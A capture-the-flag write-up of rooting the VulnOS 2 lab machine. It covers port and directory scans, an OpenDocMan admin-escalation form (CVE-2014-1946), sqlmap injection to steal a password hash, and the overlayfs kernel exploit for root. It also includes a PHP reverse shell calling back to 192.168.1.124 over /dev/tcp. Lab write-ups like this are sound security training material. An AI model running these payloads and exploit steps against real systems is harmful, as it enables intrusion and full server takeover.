Vulnos is on 192.168.57.5
Quick scan:
Nmap scan report for 192.168.57.5
Host is up (0.000093s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
6667/tcp open irc ngircd
MAC Address: 08:00:27:16:B1:0E (Oracle VirtualBox virtual NIC)
Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
I checked the website:
If I follow the link I have an ecomerce website:
Not much there for now.
Checking robots.txt …. Found a lot of things:
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these “robots” where not to go on your site,
# you save bandwidth and server resources.
#
# This file will be ignored unless it is at the root of your host:
# Used: http://example.com/robots.txt
# Ignored: http://example.com/site/robots.txt
#
# For more information about the robots.txt standard, see:
# http://www.robotstxt.org/wc/robots.html
#
# For syntax checking, see:
# http://www.sxw.org.uk/computing/robots/check.html
User-agent: *
Crawl-delay: 10
# Directories
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /themes/
# Files
Disallow: /CHANGELOG.txt
Disallow: /cron.php
Disallow: /INSTALL.mysql.txt
Disallow: /INSTALL.pgsql.txt
Disallow: /INSTALL.sqlite.txt
Disallow: /install.php
Disallow: /INSTALL.txt
Disallow: /LICENSE.txt
Disallow: /MAINTAINERS.txt
Disallow: /update.php
Disallow: /UPGRADE.txt
Disallow: /xmlrpc.php
# Paths (clean URLs)
Disallow: /admin/
Disallow: /comment/reply/
Disallow: /filter/tips/
Disallow: /node/add/
Disallow: /search/
Disallow: /user/register/
Disallow: /user/password/
Disallow: /user/login/
Disallow: /user/logout/
# Paths (no clean URLs)
Disallow: /?q=admin/
Disallow: /?q=comment/reply/
Disallow: /?q=filter/tips/
Disallow: /?q=node/add/
Disallow: /?q=search/
Disallow: /?q=user/password/
Disallow: /?q=user/register/
Disallow: /?q=user/login/
Disallow: /?q=user/logout/
However some files/folders are not accesible (Clean urls) or restricted:
The source of the page indicates that it is running drupal 7:
<meta name=”Generator” content=”Drupal 7 (http://drupal.org)” />
Let’s try gobuster
gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.57.5/jabc
=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://192.168.57.5/jabc/
[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
=====================================================
2019/05/29 11:35:56 Starting gobuster
=====================================================
/templates (Status: 301)
/misc (Status: 301)
/themes (Status: 301)
/modules (Status: 301)
/scripts (Status: 301)
/sites (Status: 301)
/includes (Status: 301)
/profiles (Status: 301)
=====================================================
2019/05/29 11:37:15 Finished
=====================================================
and
gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.57.5
=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://192.168.57.5/
[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
=====================================================
2019/05/29 11:36:06 Starting gobuster
=====================================================
/javascript (Status: 301)
/server-status (Status: 403)
=====================================================
2019/05/29 11:37:27 Finished
Nothing there!
I went back to jabc and found this:
But when I try to access it, I receive an empty response.
Tried the login page and sent it to Burp:
POST /jabc/?q=user/login/ HTTP/1.1
Host: 192.168.57.5
User-Agent: Mozilla/4.0 (compatible; Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060414; Windows NT 5.1)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.57.5/jabc/?q=user/login/
Content-Type: application/x-www-form-urlencoded
Content-Length: 115
Cookie: has_js=1; SESS44909b7d2458c4a03ee24e5944921617=EQ2aVhZRa0Mnu0vb1oHH_8bDB3b69zYURxi9ZFaityc
Connection: close
Upgrade-Insecure-Requests: 1
name=erik&pass=ckp9rvq2&form_build_id=form-7E_t5yiux-kbs2Li3AdGhr4BVtJnimp9ocIZl2XPavw&form_id=user_login&op=Log+in
Then tried wfuzz:
wfuzz -w /usr/share/wordlists/wfuzz/general/common.txt –hc 186 -d “name=admin&pass=FUZZ&form_build_id=form-7E_t5yiux-kbs2Li3AdGhr4BVtJnimp9ocIZl2XPavw&form_id=user_login&op=Log+in” http://192.168.57.5/jabc/ > /root/boxes/VulnOS2/fuzz.txt
Nothing
Went back to the webpage and check Documentation.
In the page source, there is a new url and login / password as guest:
<p><span style=”color:#000000″>For a detailed view and documentation of our products, please visit our documentation platform at /jabcd0cs/ on the server. Just login with guest/guest</span></p>
I did login as guest.
Then search exploit:
2) Improper Access Control in OpenDocMan: CVE-2014-1946
The vulnerability exists due to insufficient validation of allowed action in “/signup.php” script when updating userâ??s profile. A
remote authenticated attacker can assign administrative privileges to the current account and gain complete control over the applica
tion.
The exploitation example below assigns administrative privileges for the current account:
<form action=”http://[host]/signup.php” method=”post” name=”main”>
<input type=”hidden” name=”updateuser” value=”1″>
<input type=”hidden” name=”admin” value=”1″>
<input type=”hidden” name=”id” value=”[USER_ID]”>
<input type=”submit” name=”login” value=”Run”>
</form>
Modified guest to be admin. But still not enough privilegies.
I tried to upload a php script but it is refused due to mime type control.
I however can modify the webmin user password.
Bingo! Admin!
(Login webmin, password admin)
I uploaded my reverse shell php code:
<?php
exec(“/bin/bash -c ‘bash -i >& /dev/tcp/192.168.1.124/443 0>&1′”);
?>
and run nc -lvnp 443 on my kali
But still cannot have to php to be executed.
Check the settings and found the dataDir.
But files are stored with a .dat extension… So still cannot execute php
I tried to upload it as reverse.php.png
But still cannot execute it.
/var/www/html/jabcd0cs/uploads/
Searching for vulenrabilities:
OpenDocMan 1.3.4 – ‘search.php where’ SQL Injection | exploits/php/webapps/46500.txt
Trying sqlmap to enumerate webmin password:
sqlmap –url “http://192.168.56.104//jabcd0cs/ajax_udf.php?q=1$add_value=odm_user” -p add_value –dbs
Then fiding the user table and finally grab the password hash for webmin
Once the hash decoded: webmin1980
The ssh into the box:
ssh webmin@192.168.56.104
webmin@192.168.56.104’s password:
Welcome to Ubuntu 14.04.4 LTS (GNU/Linux 3.13.0-24-generic i686)
* Documentation: https://help.ubuntu.com/
System information as of Tue Jun 4 15:20:49 CEST 2019
System load: 0.0 Processes: 84
Usage of /: 5.8% of 29.91GB Users logged in: 0
Memory usage: 12% IP address for eth0: 192.168.56.104
Swap usage: 0%
Graph this data and manage this system at:
https://landscape.canonical.com/
Last login: Tue Jun 4 15:20:49 2019 from 192.168.56.1
Getting a proper shell:
python -c 'import pty; pty.spawn("/bin/bash")'
Then checking os version:
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 14.04.4 LTS
Release: 14.04
Codename: trusty
searchsploit:
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) – ‘overlayfs’ Local Privilege | exploits/linux/local/37292.c
Compile the code and execute:
webmin@VulnOSv2:/var/www/html/jabcd0cs/uploads$ gcc -o test test.c
webmin@VulnOSv2:/var/www/html/jabcd0cs/uploads$ ./test
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),1001(webmin)
cd /root
# alias ll=”ls -al”
# ll
total 36
drwx—— 3 root root 4096 May 4 2016 .
drwxr-xr-x 21 root root 4096 Apr 3 2016 ..
-rw——- 1 root root 9 May 4 2016 .bash_history
-rw-r–r– 1 root root 3106 Feb 20 2014 .bashrc
drwx—— 2 root root 4096 May 2 2016 .cache
-rw-r–r– 1 root root 140 Feb 20 2014 .profile
-rw——- 1 root root 3 May 2 2016 .psql_history
-rw——- 1 root root 735 May 4 2016 .viminfo
-rw-r–r– 1 root root 165 May 4 2016 flag.txt
# cat flag.txt
Hello and welcome.
You successfully compromised the company “JABC” and the server completely !!
Congratulations !!!
Hope you enjoyed it.
What do you think of A.I.?